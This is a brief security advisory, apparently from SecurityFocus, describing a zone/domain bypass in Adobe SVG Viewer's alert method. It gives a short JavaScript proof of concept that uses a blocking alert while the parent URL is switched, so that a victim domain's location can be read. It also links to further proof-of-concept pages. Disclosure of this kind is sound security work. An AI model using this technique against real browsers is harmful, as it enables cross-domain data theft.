Adobe SVG Viewer Alert Method Zone/Domain Bypass Vulnerability

The following example was provided:

alert("Press OK to continue...");
// At this point, another thread changes the parent URL to the victim domain
parent.alert(parent.location.href); // Outputs the victim domain once the user has pressed OK

Proof-of-concept examples have been made available on the following web page:

http://sec.greymagic.com/adv/gm004-mc/

Copyright 2010, SecurityFocus